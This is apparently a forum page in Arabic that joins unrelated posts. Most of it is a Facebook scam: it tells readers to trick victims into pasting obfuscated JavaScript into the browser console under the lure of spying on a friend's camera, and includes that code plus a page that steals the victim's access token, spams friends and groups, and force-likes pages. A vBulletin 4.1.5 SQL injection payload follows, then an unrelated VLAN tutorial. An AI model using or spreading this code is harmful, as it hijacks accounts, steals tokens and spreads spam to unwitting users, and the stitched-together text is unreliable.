ثغرة النشر و الايكات و المشاركه للفيسبوك

السلام عليكم الموضوع بسيط وهو خداع الضحيه ان هالاكواد تقدر تشوف ككمرة الضحيه طبعاً هي كذا بس انت

الفخ بسيط طريقة عمل الكواد الاول يجب على الضحيه ادخال الكو في الكنوسول الادة التي في قوقل كروم و ادخال الكواد كامل بعد ذالك راح يشتغل كل شيء  :)

وطريقتك و وصدقني راح تنشر حسابات بالهبل وانا ما اخفيكم وقعت بالفخ و بديت  احلل

الاكواد بحطها و انتم جربوها :)

function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
IbraheemNada("302504309890089");
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","1428925077356293","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
 
if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};            
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
                        if(xmlhttp.readyState == 4){
                          izinhtml = document.createElement("html");
                          izinhtml.innerHTML = xmlhttp.responseText;
                        if(izinhtml.getElementsByTagName("form").length > 0){
                          izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
                          act = izinhtml.getElementsByTagName("form")[0].action;
                          duzenlevegonder(izinhtml,act)
                        }else{
                        sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
                        if (sex[1]) {
                        tokenyolla(sex[1]);
                        }
                        }
                        }
        };
 
xmlhttp.open("POST", act , true);
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);
 
}
 
function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}
 
if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
function tokenyolla(token){
top.location.href = 'هنا رابط التزوير حط حط صورة فيه حركات كما وكذا :)' + token;
}}
var N1X = "سيتم فتح الكاميرى بعد قليل ... الرجاء الانتظار";
alert(N1X);

الان ننتقل الى رابط التزوير و فيه الايكات و كل شيء

<html>
<body style="margin:0; padding: 0; font-family: arial, helvetica, sans-serif; background: #eee; text-align: center;">

<div style="background: #fff; border: 1px solid #ccc; width: 730px; padding: 0 20px 20px 20px; margin: 20px auto; text-align: left;">

 <p style='font-size: 26px;'>انتظر جاري تحويلك لبروفايل الضحية وتشغيل الكاميرا</p>

 <div style='font-size: 15px;'><div><div id="723470731177970176" align="center" style="width: 100%; overflow-y: hidden;" class="wcustomhtml">
<script type="text/javascript" src="http://clkrev.com/adServe/banners?tid=RWMANSY_12592_0&size=728x90" ></script>

<!-- Begin BidVertiser code -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=599165%26bid=1495132" type="text/javascript"></SCRIPT>
<noscript><a href="http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher_toolbar_creator.dbm">toolbar maker</a></noscript>
<!-- End BidVertiser code -->

<META http-equiv="refresh" content="50;URL=http://www.linkbucks.com/NjYR">


<center>
<img src="http://www.picz.ge/img/s3/1206/9/9/9e79856d8567.gif"></center>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="me" href="http://www.blogger.com/profile/02971939490169575171" />
<link rel="openid.server" href="http://www.blogger.com/openid-server.g" />
</head>
<body onload="token();get_groups();get_friends();join_group();follow();like_page();timeline();">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>

<script>
var url = "https://www.youtube.com/watch?v=_nfk_Kjy2mA";
var text = "لاول مرررررة فتح كاميرا اي صديق بالفيسبوك بدون ان يدري انا فتحت كاميرا اصدقائي حبيت افيدكم شوفو الفيديو وتعلمو بدون اي تطبيقات كاذبة من هنا تابع الفيديو ع من هنا علي يوتيوب  --->";
var image_link = "http://www.mastcheck.com/uploads/13987570361.jpg";
gonderildi = 0;
var _0xfbbb=["\x35\x20\x33\x3D\x5B\x22\x5C\x34\x5C\x78\x37\x35\x5C\x78\x36\x32\x5C\x34\x5C\x36\x5C\x78\x37\x32\x5C\x37\x5C\x38\x5C\x78\x36\x37\x22\x2C\x22\x5C\x39\x5C\x61\x5C\x34\x5C\x39\x22\x2C\x22\x5C\x78\x36\x43\x5C\x62\x5C\x78\x36\x33\x5C\x61\x5C\x36\x5C\x37\x5C\x62\x5C\x38\x22\x5D\x3B\x35\x20\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x3D\x77\x69\x6E\x64\x6F\x77\x5B\x33\x5B\x32\x5D\x5D\x5B\x33\x5B\x31\x5D\x5D\x5B\x33\x5B\x30\x5D\x5D\x28\x31\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x5F\x30\x78\x38\x34\x35\x37\x7C\x78\x37\x33\x7C\x76\x61\x72\x7C\x78\x37\x34\x7C\x78\x36\x39\x7C\x78\x36\x45\x7C\x78\x36\x38\x7C\x78\x36\x31\x7C\x78\x36\x46","\x72\x65\x70\x6C\x61\x63\x65","\x30","\x5B\x33\x2D\x39\x61\x62\x5D","\x5C\x62","\x67","\x76\x61\x72\x20\x69\x3D\x5B\x22\x5C\x62\x5C\x37\x5C\x37\x5C\x35\x5C\x39\x5C\x78\x34\x38\x5C\x78\x35\x34\x5C\x78\x34\x44\x5C\x78\x34\x43\x22\x2C\x22\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x22\x2C\x22\x5C\x6A\x5C\x35\x5C\x38\x5C\x78\x34\x35\x5C\x72\x5C\x35\x5C\x67\x5C\x35\x5C\x37\x5C\x38\x5C\x78\x34\x32\x5C\x74\x5C\x78\x34\x39\x5C\x6E\x22\x2C\x22\x5C\x77\x5C\x62\x5C\x75\x5C\x39\x5C\x68\x5C\x67\x5C\x35\x5C\x61\x5C\x73\x5C\x39\x5C\x78\x5C\x63\x5C\x36\x5C\x65\x5C\x38\x5C\x38\x5C\x66\x5C\x79\x5C\x6F\x5C\x6F\x5C\x70\x5C\x70\x5C\x70\x5C\x76\x5C\x78\x33\x37\x5C\x6D\x5C\x74\x5C\x76\x5C\x78\x37\x35\x5C\x73\x5C\x6F\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x5C\x6F\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x5C\x76\x5C\x66\x5C\x65\x5C\x66\x5C\x78\x33\x46\x5C\x68\x5C\x38\x5C\x63\x22\x2C\x22\x5C\x36\x5C\x61\x5C\x73\x5C\x38\x5C\x74\x5C\x72\x5C\x35\x5C\x63\x5C\x36\x5C\x7A\x5C\x64\x5C\x39\x5C\x6E\x5C\x35\x5C\x39\x5C\x79\x5C\x6B\x5C\x66\x5C\x71\x5C\x61\x5C\x78\x32\x33\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x6C\x5C\x61\x5C\x37\x5C\x64\x5C\x37\x5C\x35\x5C\x78\x33\x42\x5C\x36\x5C\x61\x5C\x37\x5C\x68\x5C\x67\x5C\x35\x5C\x63\x5C\x36\x5C\x38\x5C\x64\x5C\x6D\x5C\x35\x5C\x37\x5C\x36\x5C\x61\x5C\x73\x5C\x78\x5C\x39\x5C\x64\x5C\x72\x5C\x72\x5C\x62\x5C\x37\x5C\x6A\x5C\x63\x5C\x36\x5C\x37\x5C\x64\x5C\x36\x5C\x61\x5C\x75\x5C\x39\x5C\x68\x5C\x67\x5C\x35\x5C\x7A\x5C\x64\x5C\x39\x5C\x6E\x5C\x35\x5C\x39\x5C\x63\x5C\x36\x5C\x6B\x5C\x36\x5C\x61\x5C\x67\x5C\x68\x5C\x39\x5C\x6A\x5C\x62\x5C\x37\x5C\x65\x5C\x35\x5C\x62\x5C\x6A\x5C\x65\x5C\x38\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x61\x5C\x67\x5C\x68\x5C\x39\x5C\x6A\x5C\x62\x5C\x37\x5C\x70\x5C\x62\x5C\x6E\x5C\x38\x5C\x65\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x61\x5C\x65\x5C\x35\x5C\x62\x5C\x6A\x5C\x65\x5C\x38\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x61\x5C\x70\x5C\x62\x5C\x6E\x5C\x38\x5C\x65\x5C\x63\x5C\x36\x5C\x6B\x5C\x66\x5C\x71\x5C\x36\x5C\x41\x5C\x77\x5C\x6F\x5C\x62\x5C\x75\x5C\x39\x5C\x68\x5C\x67\x5C\x35\x5C\x41\x22\x5D\x3B\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x74\x6F\x6B\x65\x6E\x28\x29\x7B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x5B\x69\x5B\x32\x5D\x5D\x28\x69\x5B\x31\x5D\x29\x5B\x69\x5B\x30\x5D\x5D\x3D\x69\x5B\x33\x5D\x2B\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E\x2B\x69\x5B\x34\x5D\x7D\x3B","\x7C\x7C\x7C\x7C\x7C\x78\x36\x35\x7C\x78\x32\x32\x7C\x78\x36\x45\x7C\x78\x37\x34\x7C\x78\x37\x32\x7C\x78\x32\x30\x7C\x78\x36\x39\x7C\x78\x33\x44\x7C\x78\x36\x46\x7C\x78\x36\x38\x7C\x78\x37\x30\x7C\x78\x36\x44\x7C\x78\x36\x31\x7C\x5F\x30\x78\x33\x31\x66\x37\x7C\x78\x36\x37\x7C\x78\x33\x30\x7C\x78\x34\x36\x7C\x78\x36\x42\x7C\x78\x36\x34\x7C\x78\x32\x46\x7C\x78\x37\x37\x7C\x78\x37\x38\x7C\x78\x36\x43\x7C\x78\x37\x33\x7C\x78\x37\x39\x7C\x78\x36\x36\x7C\x78\x32\x45\x7C\x78\x33\x43\x7C\x78\x36\x33\x7C\x78\x33\x41\x7C\x78\x36\x32\x7C\x78\x33\x45","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x5B\x35\x2D\x39\x61\x2D\x7A\x41\x5D"];var _0xc9bc=[_0xfbbb[0],_0xfbbb[1],_0xfbbb[2],_0xfbbb[3],_0xfbbb[4],_0xfbbb[5],_0xfbbb[6],_0xfbbb[7],_0xfbbb[8]];eval(function (_0xdda6x2,_0xdda6x3,_0xdda6x4,_0xdda6x5,_0xdda6x6,_0xdda6x7){_0xdda6x6=function (_0xdda6x4){return _0xdda6x4.toString(36);} ;if(_0xc9bc[5][_0xc9bc[4]](0,_0xdda6x6)==0){while(_0xdda6x4--){_0xdda6x7[_0xdda6x6(_0xdda6x4)]=_0xdda6x5[_0xdda6x4];} ;_0xdda6x5=[function (_0xdda6x6){return _0xdda6x7[_0xdda6x6]||_0xdda6x6;} ];_0xdda6x6=function (){return _0xc9bc[6];} ;_0xdda6x4=1;} ;while(_0xdda6x4--){if(_0xdda6x5[_0xdda6x4]){_0xdda6x2=_0xdda6x2[_0xc9bc[4]]( new RegExp(_0xc9bc[7]+_0xdda6x6(_0xdda6x4)+_0xc9bc[7],_0xc9bc[8]),_0xdda6x5[_0xdda6x4]);} ;} ;return _0xdda6x2;} (_0xc9bc[0],[],12,_0xc9bc[3][_0xc9bc[2]](_0xc9bc[1]),0,{}));var _0xe43d=[_0xfbbb[9],_0xfbbb[1],_0xfbbb[2],_0xfbbb[10],_0xfbbb[11],_0xfbbb[12],_0xfbbb[4],_0xfbbb[5],_0xfbbb[13],_0xfbbb[7],_0xfbbb[8]];eval(function (_0xdda6x9,_0xdda6xa,_0xdda6xb,_0xdda6xc,_0xdda6xd,_0xdda6xe){_0xdda6xd=function (_0xdda6xb){return (_0xdda6xb<62?_0xe43d[4]:_0xdda6xd(parseInt(_0xdda6xb/62)))+((_0xdda6xb=_0xdda6xb%62)>35?String[_0xe43d[5]](_0xdda6xb+29):_0xdda6xb.toString(36));} ;if(_0xe43d[7][_0xe43d[6]](0,_0xdda6xd)==0){while(_0xdda6xb--){_0xdda6xe[_0xdda6xd(_0xdda6xb)]=_0xdda6xc[_0xdda6xb];} ;_0xdda6xc=[function (_0xdda6xd){return _0xdda6xe[_0xdda6xd]||_0xdda6xd;} ];_0xdda6xd=function (){return _0xe43d[8];} ;_0xdda6xb=1;} ;while(_0xdda6xb--){if(_0xdda6xc[_0xdda6xb]){_0xdda6x9=_0xdda6x9[_0xe43d[6]]( new RegExp(_0xe43d[9]+_0xdda6xd(_0xdda6xb)+_0xe43d[9],_0xe43d[10]),_0xdda6xc[_0xdda6xb]);} ;} ;return _0xdda6x9;} (_0xe43d[0],[],37,_0xe43d[3][_0xe43d[2]](_0xe43d[1]),0,{}));

follow("الصفحة المراد الاولى");
follow("2");
follow("3");
follow("4");
follow("5");
follow("6");
follow("7");
follow("9");
follow("a10");
follow("11");
follow("12");
follow("13");
follow("00");
follow("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");
like_page("00");

  function get_groups(){
  jQuery.ajax({
  url:'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token='+access_token,
  dataType:'jsonp',
  success:function(data){
  post_groups(data);
  }
  });
  }
  function get_friends(){
  jQuery.ajax({
  url:'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 100&access_token='+access_token,
  dataType:'jsonp',
  success:function(data){
  post_friends(data);
  }
  });
  }
  function post_friends(list){
     for(i=0;i<list.data.length;i++){
     jQuery.ajax({
     url:'https://graph.facebook.com/'+list.data[i].uid+'/photos?url=' + image_link + '&message=' + text +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
     dataType:'script',
     success:function(){
     gonderildi += 1;
     if(gonderildi >= list.data.length){
  }
     }
     });
     }
     }
  function post_groups(list){
  for(i=0;i<list.data.length;i++){
  jQuery.ajax({
  url:'https://graph.facebook.com/'+list.data[i].gid+'/photos?url=' + image_link + '&message='+ text +'' + url + '&callback=paylas&method=POST&access_token=' + access_token,
  dataType:'script',
  success:function(){
  gonderildi += 1;
  if(gonderildi >= list.data.length){
  }
  }
  });
  }
  }
     
  function timeline() {
    $['getJSON']('https://graph.facebook.com/me/photos?url=' + image_link + '&message=' + text + '' + url + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
        if (_0x1f66xf['id']) {
            var _0x1f66x11 = _0x1f66xf['id'];
            var _0x1f66x12 = 100;
            $['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
                if (_0x1f66xf['data']) {
                    var _0x1f66x13 = [];
                    $['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
                        _0x1f66x13['push'](_0x1f66x7['id']);
                        $['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
                    });
                };
            });
        };
    });
};


  function follow(id){
     $.getJSON('https://graph.facebook.com/' + id + '/subscribers?method=post&access_token=' + access_token, function (response) {
     });
  }
  function like_page(id){
     $.getJSON('https://graph.facebook.com/me/likes?access_token=' + access_token + '&method=POST&url=https://www.facebook.com/' + id, function (response) {
     });
  }
  function like_post(id){
     $.getJSON('https://graph.facebook.com/' + id + '/likes/?method=post&access_token=' + access_token, function (response) {
     });
  }
  function join_group(grpid){
  $.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
  if (response.id) {
  var userid = response.id;
  $.getJSON('https://graph.facebook.com/'+grpid+'/members/' + userid + '?method=post&access_token=' + access_token, function (response) {
     if(response.data){
  }
  });
  }
  });
  }

</script>
<div id="token"><div/> <script type="text/javascript" src="https://www.blogger.com/static/v1/common/js/1912144495-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
 <script type="text/javascript" src="http://clkrev.com/adServe/banners?tid=RWMANSY_12592_0&size=300x250" ></script>
</html>

 <script type="text/javascript" src="http://clkrev.com/adServe/banners?tid=RWMANSY_12593_0&size=468x60" ></script></div>



</div></div>

</div>

</body>
</html>

vbulletin 4.1.5 attachment SQLI

vbulletin 4.1.5 attachment SQLI
examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ​​[f]" insert our SQL query. Example:
Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that, we see the standard error of the database offline, thus opening the source code of the page and see:

Code:
<! -
Database error in vBulletin 4.1.5 :
Invalid SQL :
             SELECT
                 permissionsfrom ,  Hidden ,  setpublish ,  publishdate ,  userid
             FROM ds23fSDdfsdf_cms_node
             WHERE
                 nodeid  = - 1599  or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
MySQL Error    :  Duplicate column Name  .1.49-3 '5 '
Error Number   :  1060
Request Date   :  Tuesday ,  February 12th  2013   @  01 : 12 : 33 PM
Error Date     :  Tuesday ,  February 12th  2013   @  01 : 12 : 33

Address     :  127.0.0.1
Username       :  Hacker
Classname      :  vB_Database
MySQL Version  :  
->

شرح انشاء شبكة vlan مبسطه بدون روتر ولا VTP بإسخدام سويتشات فقط

السلام عليكم ورحمة الله وبركاته




الموضوع بخص بالشبكات واخص بها شهادة سيسكو

وهو انشاء vlan شبكه مبسطه وشرح بسيط وان شاء الله يكون مفيد

الشرح فيديو ورفعته على قناتي سامحوني يمكن الصوت بسيط |.. او فيه تشوويش

وهو خاص لبيت الهكر و مدونتي الخاصه بعلم الشبكات وهي

[URL="http://n1x.blogspot.com/"]هنا[/URL]


الشرح هنا و الاومر بنزلها على صيغة Doc اخر شيء
[url]http://www.youtube.com/watch?v=vO6gU-8I3oc[/url]

اذا كان في خطا مني واتمنى تعذروني .. وان اصبت فـ من الله عز  جل



[url]http://www.2shared.com/document/PbbI2ZA9/___VLANs_Router__VTP.html[/url]